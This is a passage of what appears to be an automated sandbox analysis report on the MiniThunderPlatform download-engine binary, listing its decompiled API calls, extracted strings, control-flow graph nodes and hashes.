                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 100A83DE
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A83F0
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A83FD
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100A8427
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100A84A2
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A84B3
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A84C5
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A84DA
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100A84F4
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A8510
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 100A8548
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A855A
                                                                                                                                              • ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0), ref: 100A856C
                                                                                                                                              • ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0), ref: 100A8585
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Basic ), ref: 100A859E
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100A8600
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A8612
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A8624
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A8638
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,?,?,?,?,00000000,?,?,?,00000000,?,?,?,1027B998), ref: 100A8652
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A866E
                                                                                                                                                • Part of subcall function 10078F50: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,10247FD9,000000FF), ref: 10078F78
                                                                                                                                                • Part of subcall function 10078F50: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,10247FD9,000000FF), ref: 10078F88
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 100A86B8
                                                                                                                                              • ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0), ref: 100A86CA
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Basic ), ref: 100A86E3
                                                                                                                                                • Part of subcall function 10001482: __EH_prolog.LIBCMT ref: 10001487
                                                                                                                                                • Part of subcall function 10001482: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,10277ABC), ref: 1000149A
                                                                                                                                                • Part of subcall function 10001482: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(?), ref: 100014AB
                                                                                                                                                • Part of subcall function 10001482: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 100014B5
                                                                                                                                                • Part of subcall function 10001482: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100014C5
                                                                                                                                                • Part of subcall function 1000EAF0: ??_V@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,?,?,?,102400D3,000000FF,100054B1,?,?), ref: 1000EC4C
                                                                                                                                                • Part of subcall function 1000EAF0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?,?,?,?,?,?,?,?,102400D3,000000FF,100054B1,?,?), ref: 1000EC5D
                                                                                                                                                • Part of subcall function 1000EAF0: ??_V@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,?,?,?,?,102400D3,000000FF,100054B1,?,?), ref: 1000EC6D
                                                                                                                                                • Part of subcall function 1000EAF0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,102400D3,000000FF,100054B1,?,?), ref: 1000EC80
                                                                                                                                                • Part of subcall function 1000EAF0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1000EC93
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100A8745
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A8757
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A8769
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A877D
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,?,?,?,?,00000000,?,?,?,00000000,?,?,?,1027B998), ref: 100A8797
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A87B3
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 100A87EA
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A87FB
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A8810
                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(6to23.com,00000000,00000009), ref: 100A8845
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(bytes=), ref: 100A88A4
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100A88DD
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A88EF
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100A89AC
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A89BD
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A89CF
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,?,?,?,?,00000000), ref: 100A8A04
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A8A20
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 100A8A6C
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A8B16
                                                                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 100A8B7F
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 100A8B90
                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(.xunlei.com,00000000,0000000B), ref: 100A8BB3
                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(.sandai.net,00000000,0000000B), ref: 100A8BD2
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A8C3A
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 100A8D9C
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100A8DCD
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A8DE9
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 100A8E21
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A8E33
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 100A8EB5
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(HTTP/1.1,?,00000000), ref: 100A7CD9
                                                                                                                                                • Part of subcall function 10013C80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(CStringSetter,00000000,?,?,10240554,000000FF,1000417F,?), ref: 10013CA9
                                                                                                                                                • Part of subcall function 10013C80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10013CCF
                                                                                                                                                • Part of subcall function 100013D0: __EH_prolog.LIBCMT ref: 100013D5
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100013E8
                                                                                                                                                • Part of subcall function 100013D0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100013F9
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 10001403
                                                                                                                                                • Part of subcall function 100013D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10001413
                                                                                                                                                • Part of subcall function 100D0DE1: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?,?,00000007,?,00000000,?,?,?,?,?,00000000), ref: 100D0DF4
                                                                                                                                                • Part of subcall function 100D0DE1: ?rend@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$reverse_iterator@Vconst_iterator@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@XZ.MSVCP71(?,?,00000007,?,00000000,?,?,?,?,?,00000000), ref: 100D0E00
                                                                                                                                                • Part of subcall function 100D0DE1: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AVconst_iterator@12@XZ.MSVCP71(00000000,?,00000007,?,00000000,?,?,?,?,?,00000000), ref: 100D0E0E
                                                                                                                                                • Part of subcall function 100D0DE1: ?rend@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$reverse_iterator@Vconst_iterator@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@XZ.MSVCP71(?,?,00000007,?,00000000,?,?,?,?,?,00000000), ref: 100D0E1D
                                                                                                                                                • Part of subcall function 100D0DE1: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?,?,?,?,?,00000007,?,00000000,?,?,?,?,?,00000000), ref: 100D0E44
                                                                                                                                                • Part of subcall function 100D0DE1: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000007,?,?,?,?,00000007,?,00000000,?,?,?,?,?,00000000), ref: 100D0E50
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 100A8F3A
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A8F5B
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100A8F9B
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100A8FB7
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 100A8FEF
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A9001
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A900E
                                                                                                                                                • Part of subcall function 100281C0: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 10028231
                                                                                                                                                • Part of subcall function 100281C0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10028243
                                                                                                                                                • Part of subcall function 10029600: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0,?), ref: 10029645
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(request length too long!), ref: 100A9096
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102BBD20,?), ref: 100A90BC
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A9137
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A914C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A9161
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A9176
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A918B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A91A0
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A91B5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$V12@V12@@$V01@@$?append@?$basic_string@$D@1@@std@@D@2@@0@V?$basic_string@$??$?9$?assign@?$basic_string@V01@Y?$basic_string@$?rend@?$basic_string@D@2@@std@@@2@H_prologV?$reverse_iterator@Vconst_iterator@?$basic_string@$?find@?$basic_string@$?end@?$basic_string@CriticalSectionVconst_iterator@12@$??$?8EnterExceptionLeaveThrow
                                                                                                                                              • String ID: "$#$*/*$.sandai.net$.xunlei.com$0$1$6$6to23.com$Accept$Accept-Language$Authorization$Basic $Cache-Control$Connection$Cookie$GET$HTTP/1.1$Host$If-Modified-Since$Keep-Alive$M$N$O$Pragma$Proxy-Authorization$Range$Referer$S$User-Agent$bytes=$close$no-cache$request length too long!
                                                                                                                                              • API String ID: 1247736521-1837566173
                                                                                                                                              • Opcode ID: 60cbb3b46676b9cd4384753f6fd0793b2db016069a3757a5f33d0803bf5ea968
                                                                                                                                              • Instruction ID: 5077a996b817eeb74417b47500a0c7cfc17e5b5f23bfb336ac02de1b08a9159c
                                                                                                                                              • Opcode Fuzzy Hash: 60cbb3b46676b9cd4384753f6fd0793b2db016069a3757a5f33d0803bf5ea968
                                                                                                                                              • Instruction Fuzzy Hash: 23D279741083C19FD735DB64C89DBDFBBE8AFA9204F00495CE98A43292DB746648CB67
                                                                                                                                              Function 00423E90 Relevance: 112.4, APIs: 23, Strings: 41, Instructions: 406libraryloaderCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 294 423e90-424183 295 424194-4241a0 294->295 296 4241a2-4241b5 295->296 297 4241b7-424233 call 417d11 call 4170c3 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ call 418004 ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ call 418004 LoadLibraryW call 418004 295->297 296->295 308 424238-424245 297->308 309 42424b-424270 ??0?$basic_stringstream@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@H@Z call 418004 308->309 310 424338-424360 GetProcAddress call 418004 308->310 315 424272-42427e 309->315 316 424280 309->316 317 424362-424380 GetProcAddress call 418004 310->317 318 424383-42438a 310->318 319 42428a-424333 GetLastError call 418004 ??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z call 418004 call 417492 ??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z call 418004 ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV01@K@Z call 418004 ??_D?$basic_stringstream@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEXXZ call 418004 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ call 418004 315->319 316->319 317->318 321 4243ba-4243e1 318->321 322 42438c-4243b5 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ call 418004 318->322 331 424565-424593 call 417726 call 418004 319->331 327 4243e7-42442a GetProcAddress call 418004 321->327 328 42453c-42455f ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ call 418004 321->328 322->331 339 424430-424455 ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z call 418004 327->339 340 424537 327->340 328->331 349 424457-424463 339->349 350 424465 339->350 340->328 353 42446f-424535 GetLastError call 418004 ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z call 418004 ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z call 418004 ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z call 418004 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K@Z call 418004 ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ call 418004 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ call 418004 349->353 350->353 353->331
                                                                                                                                              APIs
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00424206
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71 ref: 0042421B
                                                                                                                                              • LoadLibraryW.KERNEL32(00000000), ref: 0042422B
                                                                                                                                              • ??0?$basic_stringstream@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@H@Z.MSVCP71(00000003,00000001), ref: 00424257
                                                                                                                                              • GetLastError.KERNEL32 ref: 0042428C
                                                                                                                                              • ??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z.MSVCP71(00000000,LoadLibrary failed, path: ,?,, errno: ,00000000), ref: 004242B8
                                                                                                                                              • ??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W@Z.MSVCP71(00000000), ref: 004242D2
                                                                                                                                              • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV01@K@Z.MSVCP71 ref: 004242E4
                                                                                                                                              • ??_D?$basic_stringstream@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEXXZ.MSVCP71 ref: 00424304
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00424320
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,asyn_stop_task), ref: 00424346
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,stop_task), ref: 00424370
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 004243A2
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,004485B0), ref: 004243FE
                                                                                                                                              • ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000003,00000001), ref: 0042443C
                                                                                                                                              • GetLastError.KERNEL32 ref: 00424471
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000,GetProcAddress failed, func_name: ,004485B0,, errno: ,00000000), ref: 004244AC
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 004244C3
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 004244D4
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K@Z.MSVCP71 ref: 004244E6
                                                                                                                                              • ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ.MSVCP71 ref: 00424506
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00424522
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00424552
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@_$U?$char_traits@$V?$allocator@_W@2@@std@@W@std@@$??1?$basic_string@_V10@$D@std@@@std@@$??$?6AddressD@std@@@0@ProcV?$basic_ostream@W@std@@@std@@$??$?6_D@2@@std@@D@std@@ErrorLastV01@V?$allocator@V?$basic_ostream@_W@std@@@0@$??0?$basic_stringstream@??0?$basic_stringstream@_??6?$basic_ostream@??6?$basic_ostream@_?data@?$basic_string@_D?$basic_stringstream@D?$basic_stringstream@_LibraryLoad
                                                                                                                                              • String ID: !$, errno: $, errno: $GetProcAddress failed, func_name: $LoadLibrary failed, path: $add_peer_resource$add_server_resource$asyn_stop_task$create_continued_task$create_new_task$delete_task$delete_tempfile$discard_peer_resource$download_engine.dll$force_stop_task$get_failure_detail$get_res_save_data_stat$get_resource_statistic$hz_init$init$is_enable_run$query_task_info$query_task_info_ex$read_ie_proxy$set_addition_info$set_channel_switch$set_complete_file_name$set_cookie$set_partner_id$set_proxy_info$set_res_query_cid_and_file_size$set_res_use_strategy$set_speed_limit$set_temp_file_suffix$set_thread_num$set_upload_speed_limit$set_user_agent$start_task$stop_task$thunderS_register_client$uninit
                                                                                                                                              • API String ID: 3651995306-2164738031
                                                                                                                                              • Opcode ID: 3f9c143797c558e82843c7467775b01e56645df5c8f353659db7987fa62e3372
                                                                                                                                              • Instruction ID: 7c371fe62e2d6598a1981eb650a3d01231fd11887f894fd9d3896b845fad67d4
                                                                                                                                              • Opcode Fuzzy Hash: 3f9c143797c558e82843c7467775b01e56645df5c8f353659db7987fa62e3372
                                                                                                                                              • Instruction Fuzzy Hash: E81239B1D002688FDF60DFA8C9857DDBBB4AF04308F51419AE509BB241DB799E84CF99
                                                                                                                                              Function 0041B760 Relevance: 89.9, APIs: 49, Strings: 2, Instructions: 648COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
